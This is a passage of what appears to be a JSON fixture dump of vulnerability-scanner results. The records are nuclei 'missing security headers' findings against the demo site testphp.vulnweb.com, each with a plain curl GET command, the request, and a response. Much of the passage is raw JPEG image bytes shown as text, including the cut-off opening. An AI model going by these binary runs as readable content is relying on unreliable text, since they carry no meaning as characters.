#&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0005\u0001\u0001\u0001\u0006\u0002\u0004\u0005\u0007\u0003\u0001\b��6\u0010\u0002\u0001\u0003\u0003\u0003\u0002\u0004\u0005\u0002\u0007\u0003\u0001\u0002\u0003\u0004\u0005\u0011\u0012!\u0006\u00131"A\u00072Qa\u0014\u0015#q�B�3CR���������\u001b\u0001\u0003\u0003\u0001\u0001\u0004\u0005\u0006\u0001\u0003\u0007\u0002��0\u0011\u0001\u0003\u0003\u0002\u0004\u0003\b\u0003\u0001\u0001\u0001\u0002\u0003\u0004\u0005\u0011!1\u0012\u0013AQaq�\u0006\u0014"2�������\u0015B��\f\u0003\u0001\u0002\u0011\u0003\u0011?��I�KMc��������^�ܡ�y!�2��w\u0005c�ϓϑ�\u0019�|x�\u001bT]K=$4n�2�\u0014ʌb��\f�\u0018,1φ�G�Qz~��=t�W�\u0002\u001aF*�O0uw�G�����|��q�7<6nI��<��\u0012)]%?��@�\u000ez�q���\u0014\u0003�s�j~��E ����μ��\u0017�Rׄ�H�7Y_$�5��T��\u0018Bʤ���������}\u001d�&�#R���O�d>�� y�\u001c��\u0007VR\u001c�\u0001u�v�4*Q�\u0018�� ���ަ\u0003\n\u0014�;���\f�ppt5\\��a�l\u0006��:�L��\u00059\u0007$�5ǧ�3����i��vb`�J�d�\u000f��jNﶃ:B�u�)�2\u001fS;�\u0014�"�İ�\u0007r�\u0004K1\u0003h�\u0003:.W��Y���;�w\nCI9������\tϝ3w�H��D�p�f�y�\u000b\rp���\u00171�~\u000e7x϶uWCw�D�\u000b�\u0012E@�\u000e�\u0018\u0012FAR}���\u000f\u0007\u0004\u00105:V���r����0�ѐ7W\f��\u0017n04� o}r�N>��+\rb�':�6Ll\u0011��8lx�Bt���c+[����\u000fIt�j�Y!��!�^�qʑ�,{�疉q�_�����d\u0014��G$P��\n\u000eԳ��\r�R����<g\u001cx�]�H�\u001dT�J�VشQ��l�dd�\u0003$g*\b\u0004��:�r�\u001bg�M$�\u0004h����V�Km\u0018珮F�E\u001bc����\u0018�󟲧�Ϛ�\u001b �S�v�������\u000b�\u0012�\bc}�PHq��������KQ\u001cK�WD\\��8��\u000f�Ӭ��R��i�#U+:Y�JJ���2B��\fW ��A�q�\u0019�Ρy�i��;^\u0013�4�8\u001f}}a|\u0012�\\Zu���\u0015\u001eP���±�\u0004�\u0006�//_\f�OC��\u0014KP�Xa/�j�!F\u0007k8;�@%x$`�Rx�_U\n��b��I\u0005E\u001c��%1�8�;����`����\u0007:Ww��L��rF�P{;8�����u'���\\::�b\u00163G�B�!;Ӎ�\u001caW����<\u000fa�$�`s���+䦪Ji�\u0018\u0012Aߌ+.\u001d_��\u0005P��]X\u0001��6�Z�8�\u001eK�\u0018D\u0019c�\u0018\u001a�����k��[o4O\u0015nk[����}ƚ�}�7u�Ĵ3H��M�7q&��*����N\u0007��p�ա�w�q���~�\u0001�~���=��E�锳�|��Lnp�\\3$\u000e���1����\n��;�B����(b�G�8c�\u0001vg,Ac�\u0013$�\u0005�J^�^=����ϝ\nu+�QG:\u0019B\f\u001c�#��΄�`q\u0012��M�\u0013[[�C�x�]��\u00158�4F:s\u0013"���RRT�y ���|���R�3��\u0002��ܮ}\u0011=ʎ\u0016���(bhi`H�\u0011\u0005";\u0011F�I�\n�?0b��:z�=L�4ҁ�\b�\u0001G\u0007�}������<���\u001c`t�?�8�X\u001bN�$/�[Vt�<\u001c���imS�@er�C\f\u0011�\fu\u0005������B��v�C�8� �8� ��D��uC�Z�H�s\t��Ͼ|\u0018�>O�\b\u001e��� ��\u0016�\u001d\u001c�!�>(*�Vl�PϲX�gqHӘ�]��\t\f��6L\u001cn8q.\u0015A\u0018!���5����'���\u0013�\u0016\u0013\u0006\u0014�9`�\u0005\b;9\u0007$�\u0003�hJ��ӳ�I�u=]\u0015X\u0002�\f�\u000b�'�T�_<����\u0001l��̴\u00157\u001b|�!�Id�\u0015-\u0018��w+6_�\u000b����|���jJ:��r�,\f���L\u001d�����5\u0015%W\r�\u0013��p5$�\u0016�iHऎ\u0018c\u0011"q�\fs�~�\u001f�����{�(\n1��7\u001c}��mH�ީ�\u000f�2f�i=��L�������a���2F�\f$esɩ�yt�\u0007����w\u001d7��\u0003g��':ނ�Ls�Uq\t#`@ �}KsƸK�5�j\u0016��i�@�].\u0004sȒƵ\u0012\f���퐟�p��\u0004����d\u0012\u0015��*�t�U�Lf�a\u0006A\u0002\u0017S\u001b�;�������\f0q�\u0005�u���_P6ᐰ#�\n��\u0011�\b��\u0013[)�p����KOz��r��\u0006p�$���r��[y��M;\u001ao�4���!f, /�ع^\u0010�`�\u0005\u0001ƢuM/P��%���L��1H���e�5��&с�(]��!G\u0003R:�\u0014J\t��4��e�y���%�\u000e���|g\u0019�\u0001$�~f�=Uj�u\u0015�Jj��AQG:�-c���������\u000eq��#��ˑ����~r0s��˷n�����l�s1���GIw�\u0012CW\u0004���v�s�G\u001c\u00022\u000e\b������sQQ\f��\u001dE-<2"��� �eV��q��9��r\u0018����0�Xk�\u0006����\u0014J�u��\u000e��\n2�\u001d��2.\u0014r@<x�k=MT߄\u0012,P��,-Q\u001a�r��=L1�p`s���x�=�hk�#9#ӧ�\n�C�'�f�>�h��%���^mv��K�]R�5=��;>%œ�8\u001bO,7z�g蹵%ud�2=�R:�w�D\u0011�\u0013�\u0017n���\u00047<�\f�\u001b�AƑ��Aq�|=���-p\\j\u0016&�U\u0003d����X�0US\u0019l`\u0005*��g\u0015���x��!�����\u0014HY���9�\u000f��og�k�6��8;��&�Vq�#ܕ�����z��T�9q\u0018\nN�p\u0007�Q��-\u0018��\u001aeK�B\u000f ����\u0017d.*Ȱ�U=��M|���i�A&�0ʮ��A\r�O>x��\u000f �r�^����b��i]c�!M嘜\u0001�;� \u0001�<�3_QJ�j�\b\u0012/y�Ā(p�,�W\fW!q�\u0004z��Ƞ��e�\u0011�_Qr��Ă\u001bz%E<�����Gc�S\u0012�|����3��)�"�{\twq���㺴�����̍ÇM5�׺�@����V�m��\u0019dd��d��!]��)��%Gd�\u0017h݃��wr���{b�jƪ\tQOH#\u0005�y�1���7�p\u0014��\u0017\frqik�K=m<�co����r�\u0015��ͶH"pCD���\u0013��@*FA\u0019:�q��\u001c��Qx�?��JcV���~�&U�\u0018�\u001e�ަ%@!�\u0018k���TD̐5\u001d����[��(��;���\u001b}�.VO̩%�\u0013��B���\b+�FőNH��\u001c0�:9��CGM\u001c\u0014�G\u0014(X�"�\u0001>O�p�>p��4\u0003C%e��=\u0015E��FD�1��ң\u0010��Xn�Y\u0018\u0016![,U�쓫UCMM\u001b�m\u0013\u0011����ŞA;\u0004��q��(\u001fh�t\u000e�G��t��\n�\u001b?���� �~���\u0007��eH\u0016\u0015!�\u001c�rc��"eo���׌�����\f!)\u000eO��\u001b�ttQ��p\fq�#2�Ԝ\u0003�\u0007?��[���5]Z�Dp��6KHi�F�����d k�C��\u000bURW%1h�f�0LNHʹ\u0005pp�[$\u00128�1�����4k4k\ftp�Q�j\u0014\u0006\u0005���\u0004d�b>��涁d1\u0019^I;_/u�`�U�Ͼ�PO�(\u001eڪ�Sb'\n9�\u001a����;�Q�\u001bco�V��(�o.�`\u001e�砺��=\u001bU4�_s���̴�0H�`�]�%�ڛd9\u001e��ǖ�jΣ�{���%m��$��Mٍ�i�A�~�\u0007 ��g!��+����X��G'|�L��\u0015�U5��F\u0019��8���^K\u0013C̣-9�m\u0015<w\u0010�\u0019��{���|A�Z��qhb��X)��V.�\n$��V��>�Ab����3���m����Z�����h�H�ե��nL��!M���#:=�-Cp4��V��e�d��\u0004��$�]�9\f�\u0001�<c\u001ccZGZOWm����Ve���5c*&��O�n�9<����5΢�ݣ9\u0019�����MyBQ�wY�w�*\f\u0001fWڏ\u000e��\u0012��\u0019�8]�a\u0019\u0004��\u001fQ[SU���\u001c\u0014�ћ\\Tp\\.\u0017j�V���!\u000b\u0012�QcUe-�d����P;����E4d�)h��3���� \u0012\u0001ǶH��uk}ɵ-.����gO��7;G���-ӿs�N�VDA\u0019ld�J�2$\u0003��p���7U.�Y%��Z%�����e�\u0003~>V%X��'����\u0018%z�WM;F�v\u001f�����é����}?UCp�[�vj�Tn��~�ɂ�F1����O,t��q�\b��Ϗ�T��m��8;��+A�KUl�W$�{c�;��ȩj'W\u0006\u0005A�\u001bҪIS���<��\rc\u0015\u0015�_���qV\u001d�aI6\u000e��]�\r�U���\n�[WY]h�J��m��WYd�����J�(��Q\u0013v��@_�Q��s�ܱ��5��A\u0007b��9h�+$�UWA�Hm�GX�\u0003\u0003f�ƒ��Y%����.'\u0019=3���\u0015E�����\u0001���r��A�x^E���@'����\u001af\u001bF��6��@�<�",c��J)c�!|\f�g�\u0001���%�\u000f��m!xo��\\���9���<U���<�\r��OG\u0019�D�3�F|�i�*������.�\r\u001fv��X;��h{���\\\u0005]�rJ���<�:����D�;!��"�v�z�V+����O�V���xRV=Ѝ�\u0004��D���j��\u0015$�M��:\u0003�T���ۜ��[;�\u0010IfR�N\u000b\u001e[�\u0006p<h�)�#Ս\u000fo|�\u0010e:�|�\u0011��c��\u0010�}�uf�\fq�������-Mgj&bx\u0003?MA��e\f$�H$\u001c4r.�S�y\u0007�\u001f��t�\u0007�:�c�yo\u0018\u001a\u0005"��\u001b��5c�����z\u000e\u000f��Е\\�T��[N��;��*�i��U�e�$c �yʰP��[\u00168��\u0014\u0014o�<=\u0013�SG\u001f\f�3�\u0002|ꅪ袞W��Zр�;�\u001e\u0018{6>d?�\u0006\u001b����}_��Y\u001fn�R�H\u0003,sQwx`;\u001dH �\u0018��\u0004{\u001d\u0015^�n���vJ�=\u001a\u001b�D��2mٖ*@E\u0001�*\fP\u0007�F2F�nW8�\f' �d\u001d��m���o\u0017Q�[t\u000f�j���e\u0013R�OGN�ݎ�\u0011\u001231J�!US�2\b��r\t'ZM��Yx��d\u0011��W�Y�*e_F\u0019\u0015��h��K\u0002���Iпº�T\r;�f���Q+�������;{{�g�\u00060�c�t۽eB[n]�I��Pc\u000b\u0018\u0007\u0001pp\u000f�\b9����\u0005d�\u0013?��\u0001��s��׿�4T�������|J��\u001a��\u0015�6���i\u0016)���\u0001e��rB�\u0007��\f\u0002\u00179\u0004\u0003�z:���G/e@���Z��j��=\u00038P?P��>\u0017\u001bpwj��\u0015l7\u001b\u001d�\u000b�(��\u0011\u0011hX�����\u001f(\r�b\u0014��\u0017\u0019k��m���r��jAFn�R1�R�!�=�n�h-�8�=@s����5��7G�����P5\u0014�Ԟ'\u0015�ݮL�)G }�I֫���g\u0002��\u0005��cC\u0015K�d�Ͼ>�i�'v͏��\f�\t��#w_���:k$��ֺ���I\u0017a@\f�͂�\u0001l�2�3�S����������4v0��02����\u0001$\u001e��ާ���ʐq�*L�\\\u0005{DP�Wi��V�*AK��ʛ�-$S�L�5�\b��I\u0004\u000f\u001c�e���,��X2�����#`\u001c��[`>��`��1*�{��1b\u0014�T����\u0004�G�\f[�����4�Y]�E\u0010�!��\n���\u000f��\u0015\u001c��\b��\u000bE(���q�<���Γ<#\u0019E���\u0007�՜S}1�\u001d\bQ�IRf\u0014�\n�K�y�\u0010��0��\b\u0018��d��8��3�u�H��\u00063"�\u001e�\u0004�G�\f\t\u0007�i�U�9�����*-ҵ��\r\u0011\u0014�q���-ܳ��R\u00179S�X�A�\u0006\u001c0#ʌ�FG�A��\u001fC�B��c�kl��0��\u0015��:\u0019\u0003۸U�3Av�]��Z�yv���0dm�\t\u0001���v.p\u0006\\~ڕOr�E���\t)��\u001b�\t$\u001b{�=���8\u0005�ό�y\u0007T�N�P!�z��V�gJh���ul*�KnU���\u0003#E6n���\u001b\u0005'P\\\u001e��S\u00075�,�;�\u001d��[i,\u00102���n�s�LUܤ�J8��\u001d���'��a��_\u0017\u0017\u000e\u001c��W�Q\u0006J�<-�Q����pA��\u0011��t��\u001a�����U���\u0012\u001aVffyQQ1�A\u0019Q��C`�DղR,]�Y�,^'ĉ\u001dJ+�,>W��Xd`�\u001c\u0010u��1��Id���As5MJ�:KT�+\u0018�f�-�,��x�q��[�]���������^�Z�K�����B��<�p�.�\u0012���\u0003�q�\u0019��0H`\t*qQ]++J�K$/,f)\fNW��ʶ<��<k���N�ʉ(�\u001a�\u0001-+2��8ǥW�1��H,I$�\u001d\\�mt�+�2K<�����X��\u001fՖl�����^��bi�n�[@b���"n���Ώ���<���EZU�t\u0010�\u0015,��WԹQ�F\t<`6���\u0010��K��l\u0014��̴��B���Ű�s�� ��ƾ|���])^��\t���7Ԏ\u0007k��|��9\u001e�\u0007�g�/�3T��2PR��[䥑��z��L\u0018��W�!�eJg#\u0007��u�\n|\u00170\u0002�~�_Ң�s���'��QY��n\u001f���J��\f��%cR\u0017�@,Wv|��G,�?X�kii�\u0015@��a}��G!,P\f�\u000f|�\t<\u0003�h{�� ��f\ti��2��2����\u001c��X�\u001c�\u001fvÝہ\u0019\u0007X���i���\n���m E,���dv�\u0017R0�\u0001�\f��\f���E%��4�\u0001g\u001e#l\u001f��DI8n���i���?m�D�l�U�\u001dxl6<��\u001f�\u000f��+���� !�x�⎵�\u0005�^�c�\u0013hR\u000eO��,Ř�\\�9ZZ��1��du\tU\u001b�$�>�����3h�j��\u0015�\fdp]\u0002'���\u0019S���8\u0004k@�ė��q\\n۪�\u0019e�Y\u001d�QZF$�\u000e\t��'?3\u000f\u0007\u001aZZAZ��\u0018�\f\u001e>���d����z��\u001b?Kt�[��~k\u000b�U������j1�`\r���\u001f�`\n1#,x\u0007KKU\u0016�L\u001cG|��O^>0\u0017���S$K;�����6bU\u0001bH\u0003<d��\u0016P�r�\u0018�\u001aZZmnF\bJn��aL.����RQ�Ϩl�5\u000f"�S_\u0005;��kly\u0002�\u000f�\u0007Ζ���$S���\u0003B\u0001��U_\r�puWX��wf��&\f�,m���-��\u0002F\u000e9ǂ5�X�d��\u000e��鈒�A\u0014i\u0014O�,\u000b\u0014;���ң��Ϝaik�{@���\t��\n���N�%��IGE\u0005������\u0018鷡U%�\t\\�\fĐ���\u0007�A9ڸ1�J����ui_RgM�Yʾ\u000fv#��r}M�?1�x��֩>*Fqk���9�E��T�5L��\u001bܖ8\u0018\u0019Ή�\u0016��A�6x�j��\u0013ԤNar��\u0010\b�A������w\u000f\u000f�\u0011�:�\u0007�hi\u001a�4��)�nW\n�i�a$B\u0002E6\u001dP�\u0003��d���i\u0005���D�T�(�\u0019\u000b�\u000br�P��@��\u001f�KK\\�W��X3տ�՟#�VY���C\u001d\u0002�v;�U��\f�HwaDn���1������m��VR�\u0013;,Ԑ�6�\u000e\u0019�$\u000e<iij���LM\u0005.��+��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 958, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/8.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/8.jpg.tn", + "discovered_date": "2024-11-13T02:42:36.150Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/8.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4139\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:25 GMT\r\nEtag: "4dca64a1-102b"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0005\u0001\u0001\u0001\u0006\u0002\u0003\u0004\u0005\u0001\u0007\b��;\u0010\u0001\u0003\u0002\u0004\u0002\u0006\b\u0005\u0004\u0002\u0003\u0001\u0002\u0003\u0011\u0004\u0005\u0012!1AQ\u0006\u0013"aq�\u00142T�����$B���\u0015#3�Rb4r���\u001b\u0001\u0002\u0003\u0001\u0001\u0001\u0001\u0002\u0003\u0004\u0005\u0006\u0007��(\u0011\u0002\u0001\u0003\u0003\u0004\u0002\u0002\u0003\u0001\u0001\u0002\u0003\u0011!\u0004\u00141\u0005\u0012AQ\u0013\u0015"B2ab���\f\u0003\u0001\u0002\u0011\u0003\u0011?�S�K��@�\u001bU\u0010z�~\u001d*D���@e��\u0012+�oQ��Vߩ�}I�����{9%L�Oy\u0014ÃX�z�?��h�"2��0\u000f�5ޤѺ�\u000bU��Z|\f���vv�����\u0003)����i��R���Eã�o�t\u001f\u0014\nc�5�uB�\u000fq����\u001b���t�H�)�l\u0007�� N\u0015{\u001e�\u0003�U]�7\u0012`�\tM��aT��h�k�-&\u001el)=�\u0002�F\u0013k��\u0018���W6��$��S��u�\u000ey�eQ��\u0015�I9g��\u0017�0$�\u0015��56\f�m��#�����N�Oq�����Ʋh|���I/2\u001a,-���$w\u001d~uE�[ ������V�����"<�H�\f��;�\u0015R+.A��G.F\u0018K\u0003vTڞ�e\u0013��>�\u0002p\u0007`�_�:�\u0018\u0002�0A�ދ�C�\\!�\u001eJ�����\n�H�U+Z�wQkXBS�m�\u0014װ�3B�Ȏ\u0019������+J7�\t��hI���\u0016j\u0003�G΋��{C?\u0018�\u0013`6�d��3�=s��`��(�ȟ3�����\u001b'��wཥ��W\u0005�M|b��\u001fW<ظ\u0007�\t�\u0015Q�����\u001e%?J3�\u000f�����[\u000e7\f�b�օt� 3�.\u0006���趹\u001f����FYl=���R�a�\f�B���YO�\u001f���C_:i��ײ��FY,=���R�a�\f�b���YO�\u0012�\u0007�e@Gq�Յ�&G���[\u000fhg�\u0014�X{C?\u0018��\u0019t� \u00118j�\u0012�\u0011�jSa;2G�\u0013F�,=���Rɇ�C?\u0018��#��`8�ZOe$yԨ�RwfO2h�%��3��Yp�hg�\u00147�}6��\u0010\f(��\u001esK��De\u0003�Q�\u0016#k�~1K�^���(oE��~��0����OvSL\u00188V�\bO�@��{K_\u0018�E��埌Q�1�NH�\u001c��� M������\u0013���;W$�ӷ�\r�\rZ�$;m�c(\n�T\u0001�I�4��~��Ņ�׽z\u0016�\u0014 \u0001�E�$�xk\u001bl8p�ϨR�\b�\u001d-Ŵ;���L!��V\u0016�\u0002�+�\u0003��\u001f|�u��b\bk�.:�\b�LƁZ�Ѓ�X���h/���.B�eH))!! H�!;lg�0▪E�}P}�(���)#(%[\u001d���YWQ�J�.���]��b/\u0007\u0002\u001cs�@P$����M����\u0012�SM�^\u000e-A\t܉�G\u0018�\u0016��o\u001crԼ�E�u�+*���F�.���V��˶�\u001a��-#+�7\u0004J\u0013�a\u001a� ��\u0002$M\tu\u0019���;e��Yx�(�6\u001c�!\u0004�Y���\u000e����b��\fN�\u0019E�n��#�m��9���H1�\u001f��ڠ��Ɉ���[j\u0015�!�0��\u0003\u0007�&"\u000e�j)�8��Iq�f��}��\b\n'|����Y+7r�J\u0017�7�I�U~�����Gajȩ�>`x��Ķ��8��6�]:P�FE�+*Q�\u0012F�\u00065\u0010�Tq�C\u0007yƔ��\u0010��\u0011�=��\u0019'�y�v�l�p�_\fqn+�]����$q\u001eQ�?\u001aYW����\u000fd}\u001a��q7\u0015��۔��\u0004��\t\u0002\u000f\u00025\u001ae\u001cF���8�$�\u0016��\\C\u0004f��2�\b�\u001a�5\u0011���\u0002��î[�KL�խh%N\u0013�h�\u0004�\u001c\u0001o:�d[�]�Y\\��бd�W(\u0005��\u0003S�\t�\u0013��Ũ�{�\u0013�<X4��1\u000b��,ߘ\u0004���\u0012��<9H��4�X��\r�p]Y�\u0003�\u0019"7�Q�\u0015�/�ww�u,\\:۩�\b�*ˤ�7\u0018���o�����`k�\u001a]��mEJ%Dd��"gS���\u0013�=\n�he��1%J/\u0016\u000bn�Q�۾�\u001fq�<م$�j�=.�R�/�S�hO\u000e�\u0012�$��������Ze'e\r9@�֯�ݦ'���\u0012P\u0014�\u001c���se��\u0003A��jZ�����-4�Y\u001bk����r�TBGorv\u001bӏK���}I\u0003i\\��7��0���T�\u00044�k�\u001d�$��;N\u0013vm\u0014���ܘ�Gw\u0012|\u0006��������\u0005�\n�.�p�t����r�皤\u001d0�*���\u001d�SC\u0016WV�o�9�|��C���J���C"4���\u0013R�v�.��\u0019�\u001bG��VHL\u0002\u0006i�\u0006����ޒ]B\nV�\u0019i�l�β�F\u0012\u001ce���Ќ�@\u000e�>\u0014��\u0016�YԄ�ⳒN�����x�\u0016�u���\u0010BB�\u001c�T���\u001c7�4.����x�(�V\bB3��6�غ��/�\u0012îu��$�W]@�����\u0016�a͵�4\u0014\u001a�\u001ey�\n@�'��\f�\u0004F��\u000e\u001a�{���ܦ�(��Fl���*ݻ*��T\u0014����Q�*\u0007�\u0006i�"���\u0010�t���!qw��ݷ�>�\t�cI\u0011��Y�[\u00168��-\u0015t�>��P�ҳ\u0015&`(�\u001a��üP-���1��H\u001dA=��ӕ\u0016٭�p�mՙ�tR\u0002���\u000f�w���8G)\u0007�K�]N4�Wn�\u0010�\u0003,�\fs\u0007]�3"^HPK�F�H\u001a�p�oDNa]K�2��HP\b��y�}��U�,57=Z�n��1\u0019c�����U�\u0016\u0001c\n͉�\u0016���U��\b��Jں��j���\u000e��B\u000bn%3\u0005�F�{ֵ�\u001bl\bB\u0019lI��))H��\u0003a�\u001d��S\\�n\u001dYm$+)�刐 �\f\r�����u'��0��Ҝ�i!JP�,L�\u0001\u001aL��\u001fJ�|�,p�KRB^t\u0005����h;�j�Ͳ�ԧs��H�V��m�\u0001�����C8�,�!���;�bg:�\u0004�5�\u0018\u001a��.�\u001e����[�\u0002oqE�\u0013n��R\u001a �\u0002x}k�z\u0011�3��\nn��9n\u0002V�$���Q׈\u0002I܃�y& �\\�T��F�L@\u001e\u0002���^\u001e�k�u���D\u0018��+�^��\u0004�\u0019\u0013�Y�\u0015��\u001b[莩�ħi�\u000f�:���c�<\u000b�6\u0014d�*$����L��]�\tm����\u0002\u000e�R��b���)& ������q�@��]���U��2r�)L�����,=�ш\u000b�”�܅(\t��\u0015�\u0004�?:1w\u0017��ZP��%\t�`(���D��.� �q��!��Q���Y�w+��\u0012�,)X�a`6�\u0018��*x�1\u0014K�Z��\u0007�z�,��HS\u0004�)\u0006\f�G\u0001 ���\u0018��ıD���*ԭZ7��\u0015��\\=\t’�R-���\u0010]�h��]~T��e(Ő\u0005�p���\u0004\u0003�\u001a�*+2kZ�\u0015ZD\u0014\b�YB9V�p\u0002L�Ԥ��IWn��\u0016��m&@��L�37\u001a��RX)YЂ)�� \tN\u001eop�/�R��\u000eGF�DhF�6:�M2ѻ�[��\u0001SZ\u0012�Ǻ�C�Akv��Q\r�\u0018:�H��D*]�U�H\n�II\u0013\u001bH\u001e\u0015�nQn-`(����G\u0010�\u0013�v��\u000e����5a\u0017�D����u���x�\by���\u0002#��\u001bT��J�z�\u0007Q��c_�Y%L(%o\u0010hu�7\tZb\u0012�"u��H�Tn\\�ܽVT\u0015+�\n�\u0012\u000e��X�踸jє�\u001a�~�뫺ZD���c0\u0004\u001f�W�d.��Iq3m`��c9\u0019\u001bo��Y>C���-�%���d����'X'�O��[��n�ajNl��\u0001������f�:V��ʄ'a�km$�\u001e��S\u0002�y�\u0015\u0003A�_€a�.�\u0001�!#���J�I�N�����g �Guk�q`\u0010��-�/1\n'y��/4�25\u0006x�\u0014��\u0010u�\u001ba�`%:�G\u00045�3j��H8��\u0004��PU�'¶1|=~��[Z\u0003-���:�y���\u001d\u0012e-\u0002�$�� \rD�υ[�R�c\r-)!\u000f9�W08\b�|�\u0014�7VȄX&(ղ�s\u0002\b%*�\u001fޝ�\\e\u0018��Wn���O>:���&�\n\u001c$fȭ��@�\u0002� (F�)�˽Ir\u0017$�٣qg\n��\u0019�\u001b����T�\f\u001f�\u001c�6�����(��'.i�׉�����ʙ�;q��S���FRM�J�R\t�\u001b�\u001fÊ�*���0EJ���� \u000eU�\u0002�\tY�䟥[w�\n�Ӑ�P��W\t5��6�\u0001eAGI\u001a\u0011�UD)eq$�w�|�VR\u0012�\b�t"L�Ƅ��\t�ڛ��L�s\u001e4�|��\u0001\u0001�\u0001���J�2�G7*����&\u000e�\nT��<\u0012����vaCj����*p��\u001b�#�TEڒ������M\u000f=�B�'bi�)?\u00029�y-�.V���\u0004�́���]�:�\u0015��4����rgi֚�\u001f��U��:xҚ\u0007�\u0012�p�У�S�\rj�M���\u0006�x\u0011�R�O�uQ<�Y�\u0014��J�O}3�Q�懲\u0015�ҖH\u0003��L٥e!*�xD�a\t#:\t���J�\u0010��\u001c��&*�)"�(ˆ\u0014aL\u000b\u001bR��\u001a�\u0010A(<x��P�J�Uqrd�5#6�'�Z\r::��\u0010L�sN���"��w��²z�m*�4�7&\u0016gp5=��R��*A�P����h��ي�ՙ�*%i@$�`i�k!�!S\u001a�|�ҥ\\�\u000e��$\u0014�\u0002t�j\u00022�@m R�W�1f̤�����\u0017�\u0012��p��J�\bԵ(�cz������iR�PV�\f�y%m���\u001fqS%\u00031\u001e?*T�>E\u0011\u00039\u0011�>�j�\t�>�R�Q\u0001�N�\u0014�z�@ޕ*Ҹ2ˑ�\u00026\u001bTKBH:R�Q�\u001c[I))\u0012\u0007q�LI\u0001\u000f\u00109q�J���j��4���P��\\P\u0011=��Uf���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 959, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50' 'http://testphp.vulnweb.com/pictures/5.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/5.jpg.tn", + "discovered_date": "2024-11-13T02:42:36.445Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/5.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4428\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:12 GMT\r\nEtag: "4dca64a1-114c"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , 